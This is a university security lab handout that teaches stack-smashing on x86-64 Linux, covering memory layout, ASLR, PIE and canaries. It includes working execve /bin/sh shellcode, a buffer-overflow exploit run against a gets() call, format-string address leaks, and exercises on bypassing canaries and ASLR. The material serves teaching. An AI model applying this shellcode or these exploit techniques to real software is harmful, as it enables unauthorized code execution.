Author: Eduardo R. B. Marques, DCC/FCUP
Code for the exercises in this class
Exercises marked with (C) will be covered in class, and exercises marked with (H) are left as homework.
Aim: A brief introduction to stack-smashing attacks.
In this class we will make use of the clang VM used in last class, with the Clang/LLVM compiler infra-structure installed
As in last class, you may download the cssh.sh script, and execute it as follows to connect to the clang VM using your GCP account:
$ chmod +x cssh.sh
$ ./cssh.sh clang
Welcome to Ubuntu 19.04 (GNU/Linux 5.0.0-1021-gcp x86_64)
...
xpto_gmail_com:~$
Inside the VM, fetch the examples for today's class and extract them. The following script will create a lab5code directory containing the examples.
$ curl https://www.dcc.fc.up.pt/~edrdo/aulas/qses/lectures/lab5/lab5code.tgz | tar xfz -
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 165 100 165 0 0 1006 0 --:--:-- --:--:-- --:--:-- 1006
$ cd lab5code
make clean all
Examine and execute the memareas program to get an intuition of different sections in a process address space and their likely addresses.
Example addresses
Printf [in plt]: 0x401030
Code [in text]: 0x401140
Constant [in rodata]: 0x402065
Global [data]: 0x404039
Heap: 0x606260
Stack: 0x7ffe90c243ab
Apart from the heap and stack, the other memory areas in the example defined at compilation time and embedded into the the ELF binary representation the program. You may use the size utility to get their addresses:
$ size -Ax ./memareas
./memareas :
section size addr
...
.plt 0x30 0x401020
.text 0x3d1 0x401050
...
.rodata 0xd9 0x402000
...
.data 0x10 0x404028
Execute the fcall program to get an intuition of different sections in a process address space and their likely addresses. The program uses a dump_stack() utility function (from util.c) that allows to see the contents of the stack at different program points. The FP and RA stack locations denote the frame pointer and return address respectively.
eduardorbmarques_gmail_com@clang:~/lab5code$ ./fcall
-- main before call to f --
0 64 | 0x7ffea8eaf0d0 --> (nil) | 00 00 00 00 00 00 00 00
8 56 | 0x7ffea8eaf0d8 --> 0x401685 | 85 16 @ 00 00 00 00 00
16 48 | 0x7ffea8eaf0e0 --> 0x7fac23075b20 | [ 07 # ac 7f 00 00
24 40 | 0x7ffea8eaf0e8 --> (nil) | 00 00 00 00 00 00 00 00
32 32 | 0x7ffea8eaf0f0 --> 0x1c00401640 | @ 16 @ 00 1c 00 00 00
40 24 | 0x7ffea8eaf0f8 --> 0x401070 | p 10 @ 00 00 00 00 00
48 16 | 0x7ffea8eaf100 --> 0x7ffea8eaf1f8 | f8 f1 ea a8 fe 7f 00 00
56 8 | 0x7ffea8eaf108 --> 0x1 | 01 00 00 00 00 00 00 00
64 0 | 0x7ffea8eaf110 --> 0x401640 FP | @ 16 @ 00 00 00 00 00
72 -8 | 0x7ffea8eaf118 --> 0x7fac22e93b6b RA | k ; e9 " ac 7f 00 00
-- f --
0 80 | 0x7ffea8eaf070 --> (nil) | 00 00 00 00 00 00 00 00
8 72 | 0x7ffea8eaf078 --> 0x800401433 | 3 14 @ 00 08 00 00 00
16 64 | 0x7ffea8eaf080 --> 0x7 | 07 00 00 00 00 00 00 00
24 56 | 0x7ffea8eaf088 --> 0x8 | 08 00 00 00 00 00 00 00
32 48 | 0x7ffea8eaf090 --> 0x6 | 06 00 00 00 00 00 00 00
40 40 | 0x7ffea8eaf098 --> 0x5 | 05 00 00 00 00 00 00 00
48 32 | 0x7ffea8eaf0a0 --> 0x4 | 04 00 00 00 00 00 00 00
56 24 | 0x7ffea8eaf0a8 --> 0x3 | 03 00 00 00 00 00 00 00
64 16 | 0x7ffea8eaf0b0 --> 0x2 | 02 00 00 00 00 00 00 00
72 8 | 0x7ffea8eaf0b8 --> 0x1 | 01 00 00 00 00 00 00 00
80 0 | 0x7ffea8eaf0c0 --> 0x7ffea8eaf110 FP | 10 f1 ea a8 fe 7f 00 00
88 -8 | 0x7ffea8eaf0c8 --> 0x401233 RA | 3 12 @ 00 00 00 00 00
-- main after call to f --
0 64 | 0x7ffea8eaf0d0 --> 0x7 | 07 00 00 00 00 00 00 00
8 56 | 0x7ffea8eaf0d8 --> 0x8 | 08 00 00 00 00 00 00 00
16 48 | 0x7ffea8eaf0e0 --> 0x7fac23075b20 | [ 07 # ac 7f 00 00
24 40 | 0x7ffea8eaf0e8 --> (nil) | 00 00 00 00 00 00 00 00
32 32 | 0x7ffea8eaf0f0 --> 0x1c0000001b | 1b 00 00 00 1c 00 00 00
40 24 | 0x7ffea8eaf0f8 --> 0x24 | $ 00 00 00 00 00 00 00
48 16 | 0x7ffea8eaf100 --> 0x7ffea8eaf1f8 | f8 f1 ea a8 fe 7f 00 00
56 8 | 0x7ffea8eaf108 --> 0x1 | 01 00 00 00 00 00 00 00
64 0 | 0x7ffea8eaf110 --> 0x401640 FP | @ 16 @ 00 00 00 00 00
72 -8 | 0x7ffea8eaf118 --> 0x7fac22e93b6b RA | k ; e9 " ac 7f 00 00
r=36
Dissassemble the code of fcall
obddump -D fcall > fcall.dump
and open fcall.dump.
The Linux x86-64 calling convention for user-level code means that registers %rdi, %rsi, %rdx, %rcx, %r8 and %r9 are used by main to pass the first 6 arguments to f (a1 to a6), and the remaining 2 parameters (a7 and a8) are passed through the stack. In line with the same convention, the result of f is returned on register %rax.
4011fd: bf 01 00 00 00 mov $0x1,%edi
401202: be 02 00 00 00 mov $0x2,%esi
401207: ba 03 00 00 00 mov $0x3,%edx
40120c: b9 04 00 00 00 mov $0x4,%ecx
401211: 41 b8 05 00 00 00 mov $0x5,%r8d
401217: 41 b9 06 00 00 00 mov $0x6,%r9d
40121d: 48 c7 04 24 07 00 00 movq $0x7,(%rsp)
401224: 00
401225: 48 c7 44 24 08 08 00 movq $0x8,0x8(%rsp)
40122c: 00 00
40122e: e8 2d ff ff ff callq 401160 <f>
401233: 48 89 45 e8 mov %rax,-0x18(%rbp)
You may also observe that f in turn places arguments arguments passed in the stack in registers %rax and %r9, and inversely, arguments passed in registers are pushed onto the stack frame. (The code does a lot of redundant computations, in particular copies between the stack and registers, because it has been generated with optimisation turned off.)
401168: 48 8b 45 18 mov 0x18(%rbp),%rax
40116c: 4c 8b 55 10 mov 0x10(%rbp),%r10
401170: 48 89 7d f8 mov %rdi,-0x8(%rbp)
401174: 48 89 75 f0 mov %rsi,-0x10(%rbp)
401178: 48 89 55 e8 mov %rdx,-0x18(%rbp)
40117c: 48 89 4d e0 mov %rcx,-0x20(%rbp)
401180: 4c 89 45 d8 mov %r8,-0x28(%rbp)
401184: 4c 89 4d d0 mov %r9,-0x30(%rbp)
ASLR is enabled at the operating system level given that /proc/sys/kernel/randomize_va_space contains a non-zero value (you would need to have root access to change it to 0 and disable ASLR).
Execute fcall repeatedly and you will see that most addresses changes. Some important addresses do not however, notably the RA for f that points to a location in main. The fcall program code is not a position-independent executable (PIE), hence addresses of code defined in fcall.c will be fixed.
Recompile fcall using make clean fcall PIE=1 to generate position-independent code, and you'll see that the RA of f also changes on every run.
Now execute ./nr.sh ./fcall, a shorthand for setarch `uname -m` -R ./hello, and you will see that NO address changes from run to run. The program will run without any address randomization.
Recompile fcall again, this time using make clean fcall PIE=1 CANARIES=1. If you execute ./nr.sh ./hello.sh, you will now see that stack locations just before the FP of each function changes non-deterministically in every run. These locations contain canaries.
A x86-64 shell code is given in lab5code/sc_x86_64.s. This is the same example of the class slides, taken from http://shell-storm.org/shellcode. It can be used to conduct a stack-smashing attack to obtain a /bin/sh running shell through the execve system call.
.text
.globl _start
_start:
xor %rdx, %rdx
mov $0x68732f6e69622f2f, %rbx
shr $0x8, %rbx
push %rbx
mov %rsp, %rdi
push %rax
push %rdi
mov %rsp, %rsi
mov $0x3b, %al
syscall
You can compile the shell code using sc_compile.sh and test if it works using sc_test as follows:
eduardorbmarques_gmail_com@clang:~/lab5code$ ./sc_compile.sh sc_x86_64.s
Compiling assembly code in ./sc_x86_64.s
Extracting shell code to ./sc_x86_64.bin
Hex dump
4831d248bb2f2f62696e2f736848c1eb08534889e750574889e6b03b0f05
eduardorbmarques_gmail_com@clang:~/lab5code$ ./sc_exec sc_x86_64.bin
sc_x86_64.bin: read instructions (30 bytes) ...
4831d248bb2f2f62696e2f736848c1eb08534889e750574889e6b03b0f05
$ echo This is a shell
This is a shell
$ ps
PID TTY TIME CMD
7640 pts/0 00:00:00 bash
8203 pts/0 00:00:00 sh
8205 pts/0 00:00:00 ps
$ exit
eduardorbmarques_gmail_com@clang:~/lab5code$
Consider the program given in hello.c. We will exploit the obvious buffer overflow vulnerability in the call to gets using the name buffer as argument, by using an input of the form:
<nop sled><shell code><padding><redefined return address>
For that:
Dissassemble hello
objdump -D hello > hello.dump
Looking at the assembly code, the distance of main's frame pointer in relation to name can be determined, as illustrated below. Note that the %rdi register will be set with the first argument to gets and its value is obtained from reading name's address from the stack (using the lea instruction; %rdi = %rsp - 0x90).
eduardorbmarques_gmail_com@clang:~/lab5code$ grep -n2 -e 'callq.*gets' hello.dump
411- 40119a: 48 8d bd 70 ff ff ff lea -0x90(%rbp),%rdi
412- 4011a1: 89 85 6c ff ff ff mov %eax,-0x94(%rbp)
413: 4011a7: e8 a4 fe ff ff callq 401050 <gets@plt>
414- 4011ac: 48 bf 19 20 40 00 00 movabs $0x402019,%rdi
415- 4011b3: 00 00 00
eduardorbmarques_gmail_com@clang:~/lab5code$ echo $((0x90))
144
Determine the address of name. In exercise 2, we'll that this can be leaked through a format string vulnerability. For now, let us simply leak the address directly by uncommenting:
printf("%p\n", name);
Then execute the program to leak the address (0x7fffffffe2e0 is the example value shown below). We use the nr.sh script to launch hello with ASLR disabled.
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
0x7fffffffe2e0
What’s your name?
^C
You may now generate a malicious payload using the provided sc_xploit.py script and feed the hello with the malicious input. Note that we use the frame pointer offset obtained in 2 and the buffer address obtained in 3.
eduardorbmarques_gmail_com@clang:~/lab5code$ (./sc_xploit.py sc_x86_64.bin 0x7fffffffe2e0 144 0;cat) | ./nr.sh ./hello
0x7fffffffe2e0
What’s your name?
Hello H1?H?//bin/shH?SH??PWH??;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????
echo This is a shell
This is a shell
ps
PID TTY TIME CMD
7640 pts/0 00:00:00 bash
9584 pts/0 00:00:00 bash
9585 pts/0 00:00:00 nr.sh
9588 pts/0 00:00:00 sh
9589 pts/0 00:00:00 cat
9590 pts/0 00:00:00 ps
^C
Disable the executable stack setting for hello and then verify that the attack does not work anymore.
eduardorbmarques_gmail_com@clang:~/lab5code$ execstack -c hello # Disable executable code in the stack
eduardorbmarques_gmail_com@clang:~/lab5code$ (./sc_xploit.py sc_x86_64.bin 0x7fffffffe2e0 144 0;cat) | ./nr.sh ./hello
What’s your name?
Hello H1?H?//bin/shH?SH??PWH??;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????
./nr.sh: line 2: 22917 Segmentation fault (core dumped) setarch `uname -m` -R $*
The hello program has a format string vulnerability, at the point where printf(name) is called. Since name is obtained through the gets call, the format is user-controllable.
The following two executions illustrate how printf may leak content corresponding to (missing but assumed) arguments. In particular, %n$p leaks the value of the n-th argument as illustrate for the value of "arguments" 1 and 6 below (0x6c6c6548 and 0x7ffff7fd1268).
./nr.sh ./hello
What’s your name?
%p %p %p %p %p %p
Hello 0x6c6c6548 0x7ffff7fbd580 (nil) 0x7ffff7fc2500 (nil) 0x7ffff7fd1268
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
What’s your name?
%1$p %6$p
Hello 0x6c6c6548 0x7ffff7fd1268
eduardorbmarques_gmail_com@clang:~/lab5code$
For a call to printf, in line with the x86-64 calling convention, the print format and first 5 format arguments will be passed through registers, and the remaining arguments will be passed through the stack. Hence the value of some registers (%rsi, %rdx, %rcx, %r8 and %r9 for the first 5 printf "arguments") and contents of the stack (for "arguments" 6 and above) can potentially be leaked.
Maybe the address of name is leaked? Let us look at the first 8 "printf arguments" ...
What’s your name?
1=%p 2=%p 3=%p 4=%p 5=%p 6=%p 7=%p 8=%p
Hello 1=0x6c6c6548 2=0x7ffff7fbd580 3=(nil) 4=0x7ffff7fc2500 5=(nil) 6=0x7ffff7fd1268 7=0x6f7ffe730 8=0x7fffffffe2e0
Observe that "arguments" 2, 4, 6, 8 look like stack addresses. Let us see if any of them contain strings, using the format %n$p %n$s for n=2, 4, 6, 8.
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
What’s your name?
%2$p %2$s
Hello 0x7ffff7fbd580
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
What’s your name?
%4$p %4$s
Hello 0x7ffff7fc2500
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
What’s your name?
%6$p %6$s
Hello 0x7ffff7fd1268 6
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
What’s your name?
%8$p %8$s
Hello 0x7fffffffe2e0 %8$p %8$s
From the last line, it looks like the address of name is 0x7ffd67bfbb20, as the printf format supplied is echoed (%8$p %8$s). Let us verify that by injecting the shellcode:
eduardorbmarques_gmail_com@clang:~/lab5code$ (./sc_xploit.py sc_x86_64.bin 0x7fffffffe2e0 144 0;cat) | ./nr.sh ./hello
What’s your name?
Hello H1?H?//bin/shH?SH??PWH??;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????
echo This is a shell
This is a shell
ps
PID TTY TIME CMD
12627 pts/2 00:00:00 bash
13109 pts/2 00:00:00 bash
13110 pts/2 00:00:00 nr.sh
13113 pts/2 00:00:00 sh
13114 pts/2 00:00:00 cat
13115 pts/2 00:00:00 ps
^C
Why does '%8$p' leak the address of name ?
Consider the very naive and vulnerable open_sesame program, that allows a shell to be executed when the user provides a correct passphrase ("open sesame"). The code has several similarities to an example given in the last lab class.
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./open_sesame
What is your name?
Eduardo
Eduardo, hello! Now tell me the passphrase?
open sesame
You may have a shell! 'open sesame' = 'open sesame'
$ echo This is a shell
This is a shell
$ exit
Make sure you run ./nr.sh ./open_sesame in all questions below except 5.
(Easy) Take advantage of buffer overflow vulnerabilities such that an invalid passphrase allows a user to run the shell. For instance, it may help looking at the strack frame offsets of each variable e.g., using gdb or looking at dissassembled code.
(Medium) Conduct two shellcode attacks as in previous exercises, one per each call to gets in the program. First, leak the buffer addresses explicitly, then verify if the format string vulnerability can be used to leak them. You may also place dump_stack calls in the code to help you.
(Medium) The previous attacks can be defeated by disabling executable code on the stack: execstack -c ./open_sesame. But can you overwrite the RA such that on exit main branches to the code location where the shell is created?
(Harder) Enable canaries using make clean open_sesame CANARIES=1. Verify that the format string vulnerability is able to leak canary values. Can you again overwrite the RA such that on exit main branches to the code location where the shell is created?
(Harder) Can ASLR be defeated too, i.e., when you run open_sesame "normally" ? Does PIE code generation make a difference (compile the program using make clean open_sesame PIE=1) ?